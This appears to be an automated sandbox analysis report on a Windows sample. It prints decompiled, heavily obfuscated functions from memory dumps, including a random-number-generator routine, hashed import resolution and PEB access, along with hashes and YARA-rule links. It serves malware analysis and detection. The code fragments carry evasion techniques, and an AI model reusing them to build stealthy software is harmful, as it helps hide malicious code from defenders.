String ID:
API String ID:
Opcode ID: 4fac71711326fbbf2761fda0a88783e32e7eb5902c41b16642aa50b1726292c9
Instruction ID: cbbe4de6220b98885888a836d07924f764dd146e8ea26c87d73b66c501107e1a
Opcode Fuzzy Hash: 4fac71711326fbbf2761fda0a88783e32e7eb5902c41b16642aa50b1726292c9
Instruction Fuzzy Hash: 684286B6D002059FDB00EFA8DC85AADB7B5EF89314F154528F819AB352E731AD11CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00985BF0, Relevance: .3, Instructions: 307
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00985BF0(void* __eflags) {
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				void* _t48;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				signed int _t57;
				void* _t60;
				unsigned int _t64;
				signed int _t69;
				signed int _t71;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t86;
				signed int _t97;
				signed int _t98;
				signed int _t100;
				void* _t103;
				signed int _t104;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				signed int _t111;
				signed int _t120;
				signed int _t121;
				signed int _t128;
				signed int _t131;
				signed int _t169;
				void* _t179;
				signed int _t183;
				signed int _t188;
				signed int _t194;
				void* _t195;
				void* _t196;
				signed int _t237;

				_t169 =  *0x994194; // 0x1
				_t48 = E00979D50(0x647402c3);
				_t196 = _t195 + 4;
				_t234 = _t169 - _t48;
				if(_t169 > _t48) {
					_t179 = 0xfffffc74;
					0;
					do {
						_v24 = E009720A0(_t234,  *(_t179 + 0x993b60), 0xffffffff);
						_t69 = E00979D50(0xe47400ac);
						_t71 = E009720A0(_t234, E00979D50(0x5c38c288), 0xffffffff);
						_t74 = E00973750(_t234,  !(E00972DC0(_t234, _v24,  !_t69)), _t71 | 0x384cc224);
						_t196 = _t196 + 0x28;
						 *(_t179 + 0x993b60) =  *(0x990434 + ( *(_t179 + 0x993b64) & 0x00000001) * 4) ^  *(_t179 + 0x994194) ^ ( *(_t179 + 0x993b64) & 0x7ffffffe | _t74) >> 0x00000001;
						_t179 = _t179 + 4;
						_t235 = _t179;
					} while (_t179 != 0);
					_t75 = 0xe3;
					_t120 = 0xe3;
					0;
					do {
						_v24 = _t75;
						_v20 = 0x9937d4[_t75];
						_t77 = E00979D50(0xe47400ac);
						_t78 = E00972DC0(_t235, 0xe98fe736, 0x167018c9);
						_t121 = _t120 - E00979D50(0xdd67dd4);
						_v36 = _t121 + 0x69a27d79;
						_v20 =  *((intOrPtr*)(_t121 * 4 - 0x58dcd248));
						_t81 = E009720A0(_t235, 0x7ffffffe, 0xffffffff);
						E00973750(_t235, _v20, 0x7ffffffe);
						_v28 =  !(_t78 & _v20 & _t77);
						_t86 = E00979D50(0x58908707);
						_v28 = E00972DC0(_t235, E009720A0(_t235,  !_t81 & _v20 & 0xc31b7854 | _t86 &  !( !_t81 & _v20), _t78 & _v20 & _t77 & 0xc31b7854 | E00979D50(0x58908707) & _v28),  !_t81 & _v20 & _t78 & _v20 & _t77);
						E00972DC0(_t235,  !_t81 & _v20, _t78 & _v20 & _t77);
						E00979D50(0x9b8bffb1);
						_v28 = _v28 >> 1;
						_t128 =  *(0x993448 + _v24 * 4);
						_v32 = _t128;
						_t183 =  *(0x990434 + (_v20 & 0x00000001) * 4);
						_v20 = _t183;
						_t97 = E009720A0(_t235, 0xc62da7e4, 0xffffffff);
						_t98 = E00973750(_t235, _v32, _t97);
						_t120 = _v36;
						_t188 = (_t98 |  !_t128 & 0xc62da7e4) ^ (_t97 & _v20 |  !_t183 & 0xc62da7e4);
						E009720A0(_t235, _v20, _v32);
						_t100 = _v28;
						E009720A0(_t235, _t188, _t100);
						0x9937d4[_v24] = _t188 ^ _t100;
						_t103 = E00979D50(0x647402c3);
						_t196 = _t196 + 0x68;
						_t236 = _t120 - _t103;
						_t75 = _t120;
					} while (_t120 != _t103);
					_t104 = E00973750(_t236,  *0x994190, 0x80000000);
					_t131 =  *0x9937d4; // 0x1dc0d59e
					_t105 = E00979D50(0x1b8bff52);
					_v24 = _t131;
					_t106 = E009720A0(_t236, _t131, 0xffffffff);
					_t107 = E009720A0(_t236, 1, 0xffffffff);
					_t111 = E00973750(_t236,  !(_t107 | _t106), (E00979D50(0x72976c99) | 0x16e36c35) ^ 0xe91c93ca);
					E00973750(_t236, _v24, 1);
					_t196 = _t196 + 0x30;
					_t194 = (_t105 & _t131 | _t104) >> 0x00000001 ^  *0x993e04 ^  *(0x990434 + _t111 * 4);
					_t237 = _t194;
					 *0x994194 = 0;
					 *0x994190 = _t194;
				}
				_t49 =  *0x994194; // 0x1
				_t150 = 0x9937d4[_t49];
				_t47 = _t49 + 1; // 0x2
				 *0x994194 = _t47;
				_t50 = E009720A0(_t237, 0x9937d4[_t49], 0xffffffff);
				_t51 = E00979D50(0x209e1c2b);
				E009720A0(_t237, _t150 >> 0xb, _t150);
				_t57 = E009720A0(_t237, ((_t150 & 0xbb15e378 | _t51 & _t50) ^ _t150 >> 0x0000000b ^ 0x44ea1c87) << 0x00000007 & 0x9d2c5680, (_t150 & 0xbb15e378 | _t51 & _t50) ^ _t150 >> 0x0000000b ^ 0x44ea1c87);
				E00979D50(0x8bb200ac);
				_t60 = E00973750(_t237, E009720A0(_t237, _t57, 0xffffffff), 0x33945623);
				_t64 = E00972DC0(_t237, _t60, E00973750(_t237, _t57, 0xcc6ba9dc)) ^ _t57 << 0x0000000f & 0xefc60000 ^ 0x33945623;
				return E009720A0(_t237, _t64, 0xffffffff) & _t64 >> 0x00000012 |  !(_t64 >> 0x12) & _t64;
			}

0x00985bf9
0x00985c04
0x00985c09
0x00985c0c
0x00985c0e
0x00985c14
0x00985c1f
0x00985c20
0x00985c30
0x00985c38
0x00985c54
0x00985c74
0x00985c79
0x00985ca0
0x00985ca6
0x00985ca6
0x00985ca6
0x00985caf
0x00985cb4
0x00985cbc
0x00985cc0
0x00985cc0
0x00985cca
0x00985cd2
0x00985ce6
0x00985d02
0x00985d11
0x00985d14
0x00985d1e
0x00985d35
0x00985d45
0x00985d4d
0x00985d93
0x00985d98
0x00985da5
0x00985db0
0x00985db3
0x00985dc0
0x00985dc5
0x00985dcc
0x00985dde
0x00985df7
0x00985e03
0x00985e06
0x00985e0e
0x00985e16
0x00985e1f
0x00985e2a
0x00985e36
0x00985e3b
0x00985e3e
0x00985e40
0x00985e40
0x00985e53
0x00985e5b
0x00985e68
0x00985e72
0x00985e84
0x00985e92
0x00985eb9
0x00985ec8
0x00985ecd
0x00985ed0
0x00985ed0
0x00985ed7
0x00985ee1
0x00985ee1
0x00985ee7
0x00985eec
0x00985ef3
0x00985ef6
0x00985f04
0x00985f13
0x00985f31
0x00985f45
0x00985f59
0x00985f72
0x00985f9c
0x00985fc2

Memory Dump Source

Source File: 00000003.00000002.2154499347.0000000000971000.00000020.00020000.sdmp, Offset: 00970000, based on PE: true

Associated: 00000003.00000002.2154494949.0000000000970000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154515642.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154520064.0000000000992000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2154524821.0000000000995000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bee760970abf9ed396159837c6f1e4426328b35b5b09e61041d30f74edd785b3
Instruction ID: fe7594ea8a55ed66fa7813ce0b1cffd0d34b5dd240612f84bdc395e54ae1c346
Opcode Fuzzy Hash: bee760970abf9ed396159837c6f1e4426328b35b5b09e61041d30f74edd785b3
Instruction Fuzzy Hash: 169116F7D201145BDB10ABB8BC43A6E76A5EB95325F4A4220FC1CB7392F9215E14C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 00973A30, Relevance: .1, Instructions: 149
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00973A30(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v20;
				signed char _v24;
				signed int _v28;
				signed int _v32;
				signed char _t68;
				signed int _t69;
				signed int _t72;
				signed int _t73;
				signed int _t74;
				signed int _t76;
				signed int _t79;
				signed char _t88;
				signed int _t95;
				signed char _t96;
				signed int _t97;
				signed int _t98;
				signed int _t100;
				signed int _t101;
				signed int _t109;
				signed char _t113;
				signed int _t114;
				signed int _t133;
				signed int _t145;
				signed int _t147;
				signed char _t156;
				signed int _t157;
				signed int _t162;
				signed int _t163;

				_t97 = _a12;
				_t68 = (((_a4 + 0x00000033 | _t97) - _t97 & 0x000000ff) << 6) + ((_a4 + 0x00000033 | _t97) - _t97 & 0x000000ff) * 2 + 0xd6;
				_t156 = _t68;
				_t69 = _t68 * _t97;
				_t145 = _a8;
				if((_t68 * _t97 >> 0x00000020 | _t68 ^ _t97) != 0) {
					_v32 = _t156;
					_t98 = _a4;
				} else {
					_t98 = _a4;
					_t95 = (_t69 + _t156 & 0x000000ff | _t98) & _a12;
					_t96 = _t95 - _t98;
					_v32 = _t96;
					_t69 = _t95;
					_v28 = _t96 + _t69;
				}
				_v20 = _t69;
				_t157 = _t69;
				_t72 = E00979C60(_t98, _t145, _t157, _t157 >> 0x1f);
				_v24 = 0;
				if((_t145 ^ _a16 | _t98 ^ _a12) != 0) {
					_t109 = _a12;
				} else {
					_t109 = _a12;
					if((_t72 & 0x00000001) != 0) {
						_t88 = _v20 * _v28;
						_t145 = (_t88 + _t109) * _t157;
						_v24 = (_t88 & 0x000000ff) + _t145;
					}
				}
				_t73 = _t109;
				_t74 = _t73 * _t98;
				_v28 = _t74;
				_t162 = _a16 * _t98 + _t109 * _a8 + (_t73 * _t98 >> 0x20);
				_t113 = _v24 + _t145;
				_v24 = _t113;
				_t100 = _t113 * _t74;
				_t76 = E00979D50(0x647420ac) & (_t145 ^ _t100);
				_t114 = _t76;
				_t101 = _t100 | _t114;
				_v20 = _t162;
				_t147 = _v28;
				_t163 = _t147;
				if((_t147 ^ _a12 | _t162 ^ _a16) == 0) {
					L10:
					_t101 = _t101 * _t114 + _v24;
					_t79 = _t163 * _v32;
					_t133 = _t79 * _t101 >> 0x20;
					_t76 = (_t79 * _t101 & 0x000000ff) * 0x00000045 | _t101;
					goto L11;
				} else {
					_t133 = _t163;
					if((_a8 ^ _v20 | _a4 ^ _t133) == 0) {
						L11:
						 *0x9920d8 = ((_t133 & _t133 + _t76 & 0x000000ff) + _t76) * _t101;
						return _t133;
					}
					_t163 = _t133;
					if((_v32 >> 0x0000001f ^ _a16 | _a12 ^ _v32) != 0) {
						_t133 = _t163;
						goto L11;
					}
					goto L10;
				}
			}

0x00973a39
0x00973a50
0x00973a5f
0x00973a61
0x00973a65
0x00973a68
0x00973a8b
0x00973a8e
0x00973a6a
0x00973a71
0x00973a76
0x00973a7b
0x00973a7d
0x00973a82
0x00973a86
0x00973a86
0x00973a91
0x00973a94
0x00973aa0
0x00973ab2
0x00973abb
0x00973ae0
0x00973abd
0x00973ac0
0x00973ac3
0x00973ac8
0x00973ad0
0x00973adb
0x00973adb
0x00973ac3
0x00973ae3
0x00973ae5
0x00973ae9
0x00973afa
0x00973aff
0x00973b01
0x00973b07
0x00973b19
0x00973b1b
0x00973b1e
0x00973b20
0x00973b28
0x00973b2b
0x00973b32
0x00973b5c
0x00973b63
0x00973b69
0x00973b6c
0x00973b77
0x00000000
0x00973b34
0x00973b34
0x00973b45
0x00973b79
0x00973b8c
0x00973b9d
0x00973b9d
0x00973b47
0x00973b5a
0x00973b9e
0x00000000
0x00973b9e
0x00000000
0x00973b5a

Memory Dump Source

Source File: 00000003.00000002.2154499347.0000000000971000.00000020.00020000.sdmp, Offset: 00970000, based on PE: true

Associated: 00000003.00000002.2154494949.0000000000970000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154515642.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154520064.0000000000992000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2154524821.0000000000995000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca2d520b0eace2a434c91e974c03cf051291ff1b7f281467a2ae38d137186830
Instruction ID: f66a31bbd73286d06350338249fa8d687cf58a097743e48c81d1659c5cfe0e2d
Opcode Fuzzy Hash: ca2d520b0eace2a434c91e974c03cf051291ff1b7f281467a2ae38d137186830
Instruction Fuzzy Hash: 03419673E001294B9F08CE69C8925FFB7EAEBD8310B15C42AE859E7351D574AE0687E0

Uniqueness

Uniqueness Score: -1.00%

Function 00979A60, Relevance: .1, Instructions: 127
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00979A60(void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v20;
				signed char _v24;
				signed int _t41;
				signed char _t42;
				signed int _t43;
				signed char _t45;
				signed int _t50;
				signed int _t54;
				signed int _t55;
				signed char _t59;
				signed int _t61;
				signed char _t66;
				signed int _t67;
				signed int _t68;
				signed char _t71;
				signed int _t78;
				signed char _t83;
				signed char _t85;
				signed int _t86;
				signed int _t94;
				signed int _t105;
				signed int _t116;

				_t105 = _a4;
				_t59 = (_t105 ^ 0x000000f5) - _t105;
				_t41 = E00977DD0(0xa4) & _t59;
				_t78 = _t41 * _t59 >> 0x20;
				_t42 = _t41 * _t59;
				_t68 = _t42;
				_t61 = _t42 & _t105;
				_t43 = _a8;
				asm("sbb eax, [ebp+0x14]");
				if(_t105 < _a12) {
					_t55 = _t68 + _t61;
					_t78 = _t55 * _t78 >> 0x20;
					_t68 = _t55 * _t78;
					_t43 = _t68;
					_v20 = _t43;
					_t61 = 0;
				}
				if((_t68 >> 0x0000001f ^ _a8 | _t68 ^ _t78) == 0) {
					_t94 = _a12;
				} else {
					_t94 = _a12;
					if((_t68 >> 0x0000001f ^ _a16 | _t68 ^ _t94) != 0) {
						_t54 = _v20;
						_t67 = _t61 & _t54 * _t94;
						_t43 = _t54 + _t67 + 0xe;
						_t68 = _t67;
					}
				}
				_v24 = 0;
				if((_a8 ^ _a16 | _a4 ^ _t94) != 0) {
					_v24 = 0x1cb;
				}
				_t83 = _t43 ^ _v20;
				_t45 = _t68 & _t83;
				_t66 = _t45 + 0xfffffefa;
				if((_t83 >> 0x0000001f ^ _a8 | _t83 ^ _a4) != 0 || (_t66 >> 0x0000001f ^ _a8 | _t66 ^ _a4) != 0) {
					_t71 = (_t68 ^ _t68 ^ _t66) + _t83;
					_t83 = _t71;
					_t68 = _t45 + (_t71 + _t66 & _t45) + (_t71 + _t66 & _t45);
				}
				_v20 = _t83;
				_t116 = _t83;
				if((_a16 ^ _t116 >> 0x0000001f | _a12 ^ _t116) == 0) {
					L14:
					_t50 = (_t68 ^ _v20) - _t66;
					_t85 = _v24;
					_t86 = _t50 * _t85 >> 0x20;
					_t68 = _t50 * _t85;
					goto L15;
				} else {
					asm("sbb eax, edi");
					if(_t116 >= _a4) {
						goto L14;
					}
					_t86 = _v24;
					L15:
					 *0x992098 = _t68;
					return _t86;
				}
			}

0x00979a6c
0x00979a77
0x00979a88
0x00979a8a
0x00979a8a
0x00979a8c
0x00979a91
0x00979a96
0x00979a98
0x00979a9b
0x00979a9f
0x00979aa1
0x00979aa3
0x00979aa5
0x00979aa8
0x00979aab
0x00979aab
0x00979ac0
0x00979aeb
0x00979ac2
0x00979aca
0x00979ad4
0x00979ad6
0x00979ade
0x00979ae3
0x00979ae7
0x00979ae7
0x00979ad4
0x00979afb
0x00979b04
0x00979b06
0x00979b06
0x00979b0f
0x00979b14
0x00979b19
0x00979b2f
0x00979b46
0x00979b48
0x00979b52
0x00979b52
0x00979b57
0x00979b5a
0x00979b70
0x00979b7e
0x00979b83
0x00979b85
0x00979b88
0x00979b8a
0x00000000
0x00979b72
0x00979b75
0x00979b77
0x00000000
0x00000000
0x00979b79
0x00979b8c
0x00979b8f
0x00979b9d
0x00979b9d

Memory Dump Source

Source File: 00000003.00000002.2154499347.0000000000971000.00000020.00020000.sdmp, Offset: 00970000, based on PE: true

Associated: 00000003.00000002.2154494949.0000000000970000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154515642.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154520064.0000000000992000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2154524821.0000000000995000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c0f38035d285c79a7f0708403028ac9680663ebf3e61613226eb6bfab0a3819
Instruction ID: f184b2c92588e9e474cb6b6e5de62668899e9bf4b80b8d978808229b5a8fc4b7
Opcode Fuzzy Hash: 8c0f38035d285c79a7f0708403028ac9680663ebf3e61613226eb6bfab0a3819
Instruction Fuzzy Hash: DC416433B406254B9B14CEA998911EFB7E6EFD8320B2AC525DC58BB344D634FD0687D0

Uniqueness

Uniqueness Score: -1.00%

Function 00988830, Relevance: .1, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00988830(void* __ecx, signed int _a4, intOrPtr _a8) {
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _t26;
				intOrPtr* _t28;
				void* _t34;
				void* _t42;
				signed short _t45;
				signed int _t51;
				signed int _t54;
				signed int _t55;
				signed int _t57;
				intOrPtr* _t61;
				intOrPtr* _t62;
				void* _t63;
				signed short _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t73;
				intOrPtr* _t79;
				intOrPtr _t81;

				_t26 = E009800D0(_a8);
				_t68 = _t67 + 4;
				_t76 = _t26;
				_v32 = _t26;
				if(_t26 == 0) {
					L6:
					return 0;
				}
				_t48 = _a4;
				_t28 = E00989180(_t76, _a4);
				_t69 = _t68 + 4;
				_t61 = _t28;
				if(_t61 != 0) {
					if( *_t61 == 0) {
						goto L6;
					}
					_t62 = _t61 + 0x14;
					_t79 = _t62;
					while(1) {
						_t34 = E0097ACF0(E00971460(_t79,  *((intOrPtr*)(_t62 - 8)) + 0x20e4c70e, _t48) + 0xdf1b38f2, _t79, _a8, E00971460(_t79,  *((intOrPtr*)(_t62 - 8)) + 0x20e4c70e, _t48) + 0xdf1b38f2);
						_t69 = _t69 + 0x10;
						if(_t34 == 0) {
							break;
						}
						_t81 =  *_t62;
						_t62 = _t62 + 0x14;
						if(_t81 != 0) {
							continue;
						}
						goto L6;
					}
					_t51 =  ~(E00971460(__eflags, E009722E0(__eflags, 0,  *((intOrPtr*)(_t62 - 0x14))),  ~_t48));
					E00971460(__eflags,  *((intOrPtr*)(_t62 - 0x14)), _a4);
					_t73 = _t69 + 0x18;
					_t66 =  *_t51;
					_v28 = _t51;
					__eflags = _t66;
					if(_t66 == 0) {
						L12:
						return 1;
					}
					_t54 = _a4;
					_t63 = 0;
					_t55 = _t54 + 0xd8be785;
					__eflags = _t55;
					_v24 = _t55;
					_v20 =  *((intOrPtr*)(_t62 - 4)) + _t54;
					while(1) {
						E00973750(__eflags, _t66, 0xffff);
						_t42 = E00979D50(0x960018d7);
						__eflags = _t66;
						_t57 = _v24 + _t66;
						_t44 =  <  ? _t66 & 0x0000ffff : _t42 + _t57 + 2;
						_t45 = E00986B30(_t66, _v32,  <  ? _t66 & 0x0000ffff : _t42 + _t57 + 2);
						_t73 = _t73 + 0x14;
						__eflags = _t45;
						_t55 = (_t57 & 0xffffff00 | _t45 != 0x00000000) & _t55;
						__eflags = _t45;
						 *(_v20 + _t63) = _t45;
						if(_t45 == 0) {
							break;
						}
						_t66 =  *(_v28 + _t63 + 4);
						_t63 = _t63 + 4;
						__eflags = _t66;
						if(__eflags != 0) {
							continue;
						}
						goto L12;
					}
					return _t55;
				}
				return 1;
			}

0x0098883c
0x00988841
0x00988844
0x00988846
0x00988849
0x0098889c
0x00000000
0x0098889c
0x0098884b
0x0098884f
0x00988854
0x00988857
0x0098885d
0x00988862
0x00000000
0x00000000
0x00988864
0x00988864
0x00988870
0x00988888
0x0098888d
0x00988892
0x00000000
0x00000000
0x00988894
0x00988897
0x0098889a
0x00000000
0x00000000
0x00000000
0x0098889a
0x009888c2
0x009888c8
0x009888cd
0x009888d0
0x009888d2
0x009888d5
0x009888d7
0x0098894a
0x00000000
0x0098894a
0x009888dc
0x009888df
0x009888e3
0x009888e3
0x009888e9
0x009888ec
0x009888f0
0x009888f8
0x00988905
0x00988910
0x00988915
0x0098891c
0x00988923
0x00988928
0x0098892e
0x00988933
0x00988935
0x00988937
0x0098893a
0x00000000
0x00000000
0x0098893f
0x00988943
0x00988946
0x00988948
0x00000000
0x00000000
0x00000000
0x00988948
0x00000000
0x00988951
0x009888a5

Memory Dump Source

Source File: 00000003.00000002.2154499347.0000000000971000.00000020.00020000.sdmp, Offset: 00970000, based on PE: true

Associated: 00000003.00000002.2154494949.0000000000970000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154515642.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154520064.0000000000992000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2154524821.0000000000995000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3d56140c696fb06c434bb8954bb3fc7c383ecb2ca708e747274fb9fee3d7b59
Instruction ID: c2faf0306794f8f3c213eba6c237bfccdfea866c17b0d916c8d8612873764f9b
Opcode Fuzzy Hash: c3d56140c696fb06c434bb8954bb3fc7c383ecb2ca708e747274fb9fee3d7b59
Instruction Fuzzy Hash: AF31D8B6D001169BDB10AA54DC42BBB7768EF40318F554424E918AB342FB31DD10C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 00979C60, Relevance: .1, Instructions: 95
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00979C60(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed char _v17;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _t35;
				signed int _t36;
				signed int _t38;
				signed int _t42;
				signed int _t44;
				signed char _t45;
				signed int _t49;
				signed char _t51;
				signed int _t53;
				signed int _t56;
				signed int _t57;
				signed int _t60;
				signed int _t75;
				signed int _t76;
				signed int _t88;
				signed int _t94;
				signed int _t95;

				_t95 = _a12;
				_t35 = _a4 * 0xffffffa5 * _t95;
				_t53 = _t35 - _t95;
				_t49 = 0;
				if((_t35 >> 0x0000001f ^ _a16 | _t35 ^ _t95) != 0) {
					_t36 = _a4;
					_t75 =  !_t95 & (_t53 | _t35) + _t36;
					_t38 = _t75 * 0x73;
					_t53 = _t75;
					_t76 = _t36;
				} else {
					_t38 = 0;
					_t76 = _a4;
				}
				asm("sbb edx, [ebp+0xc]");
				if(_t95 >= _t76) {
					_t49 = 0x3a1;
				}
				_t56 = _t53;
				_t94 = (_t38 & _t95 ^ _t49) * _t56 * 0x77;
				_t57 = _t56 ^ _t94;
				_t42 = _t49;
				_v24 = _t57;
				_v32 = _t42;
				_t51 = _t57 * _t42;
				_t44 = E00977DD0(0xc5) * _t51;
				_v17 = _t44;
				_v28 = _t94;
				_t45 = _t44 * _t94;
				_t60 = _a8;
				asm("sbb edx, ecx");
				if(_t51 >= _a4) {
					L8:
					_t88 = (_v24 + _t45 * _a4 - _t45 * _a4 ^ _v28) + _t45 * _a4 ^ _v17;
				} else {
					_t88 = _t60 ^ _a16 | _t95 ^ _a4;
					if(_t88 == 0 || (_t51 >> 0x0000001f ^ _a16 | _t95 ^ _t51) != 0) {
						goto L8;
					}
				}
				 *0x992100 = _t88;
				return _v32;
			}

0x00979c69
0x00979c73
0x00979c7c
0x00979c85
0x00979c89
0x00979c94
0x00979c9f
0x00979ca4
0x00979ca7
0x00979ca9
0x00979c8b
0x00979c8b
0x00979c8d
0x00979c8d
0x00979cb0
0x00979cb3
0x00979cb5
0x00979cb5
0x00979cbe
0x00979cc4
0x00979cc7
0x00979cc9
0x00979ccb
0x00979cd0
0x00979cd3
0x00979ce3
0x00979ce5
0x00979cea
0x00979ced
0x00979cfa
0x00979cfd
0x00979cff
0x00979d1e
0x00979d38
0x00979d01
0x00979d0b
0x00979d0d
0x00000000
0x00000000
0x00979d0d
0x00979d3a
0x00979d4a

Memory Dump Source

Source File: 00000003.00000002.2154499347.0000000000971000.00000020.00020000.sdmp, Offset: 00970000, based on PE: true

Associated: 00000003.00000002.2154494949.0000000000970000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154515642.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154520064.0000000000992000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2154524821.0000000000995000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 833769b73e86277b774f9066b7fd59e4561fddde7ffde54a66f06af921c665ff
Instruction ID: b75cfc8a94312bf319f7002a27b5d8980fd0c19dbb0172cb58394e2b998a4aba
Opcode Fuzzy Hash: 833769b73e86277b774f9066b7fd59e4561fddde7ffde54a66f06af921c665ff
Instruction Fuzzy Hash: 9931C532B000195B9F0CCE6DC8925BFBBEBEBC8311B14C12FE849DB298D93099068780

Uniqueness

Uniqueness Score: -1.00%

Function 00A50865, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2154606715.0000000000A50000.00000040.00020000.sdmp, Offset: 00A50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: ee892e56c850ce7cf3aea45e932f13b49db2c2996dfdcaed2173213115c0eaa3
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: 5B118E733406009FD714DF69DC81EA2B3EAFB98331B298166ED09CB315D676E846C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A50C5E, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2154606715.0000000000A50000.00000040.00020000.sdmp, Offset: 00A50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction ID: aa329d66137573227fa7065e85c8bc14edd6c6e86e918c53cb843ebbcd709bfe
Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction Fuzzy Hash: 8901B5773052408FD714CF2DD984D7ABBE8FBC7721B19817EC94687616D134E849C520

Uniqueness

Uniqueness Score: -1.00%

Function 0098CE40, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0098CE40(short* _a4, intOrPtr _a8) {
				void* _t8;
				short* _t9;
				intOrPtr _t10;
				short* _t11;
				void* _t12;

				_t10 = _a8;
				_t11 = _a4;
				if(_t10 != 0) {
					_t11 = _t11 + 2;
					_t9 = 0;
					while( *((short*)(_t11 - 2)) != 0) {
						L3:
						_t11 = _t11 + 2;
					}
					if( *_t11 == 0) {
						_t11 = 0;
					} else {
						_t8 = E00979D50(0x1e99166a);
						_t12 = _t12 + 4;
						_t9 = _t9 + _t8 - 0x7aed16c5;
						if(_t9 != _t10) {
							goto L3;
						} else {
						}
					}
				}
				return _t11;
			}

0x0098ce46
0x0098ce49
0x0098ce4e
0x0098ce50
0x0098ce53
0x0098ce5a
0x0098ce60
0x0098ce60
0x0098ce63
0x0098ce6e
0x0098ce8a
0x0098ce70
0x0098ce75
0x0098ce7a
0x0098ce7d
0x0098ce86
0x00000000
0x00000000
0x0098ce88
0x0098ce86
0x0098ce6e
0x0098ce92

Memory Dump Source

Source File: 00000003.00000002.2154499347.0000000000971000.00000020.00020000.sdmp, Offset: 00970000, based on PE: true

Associated: 00000003.00000002.2154494949.0000000000970000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154515642.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154520064.0000000000992000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2154524821.0000000000995000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8db077be36dd7dd0c03fe44961d1943ba693b2158ba0f316bbeb6675301aaf28
Instruction ID: 29869152b4ac4473c46bbb5ea575ca8e99e1aced05c4522abee94c9870e039d7
Opcode Fuzzy Hash: 8db077be36dd7dd0c03fe44961d1943ba693b2158ba0f316bbeb6675301aaf28
Instruction Fuzzy Hash: 5FF0A7A2E4022896E7307E54E885C67F3BDEB91754F19C029EC0963342B2B15C88C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00982EF0, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00982EF0() {

				return  *[fs:0x30];
			}

0x00982ef6

Memory Dump Source

Source File: 00000003.00000002.2154499347.0000000000971000.00000020.00020000.sdmp, Offset: 00970000, based on PE: true

Associated: 00000003.00000002.2154494949.0000000000970000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154515642.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154520064.0000000000992000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2154524821.0000000000995000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00A386D9, Relevance: 19.6, APIs: 13, Instructions: 109memorythreadCOMMON

Download Yara Rule

APIs

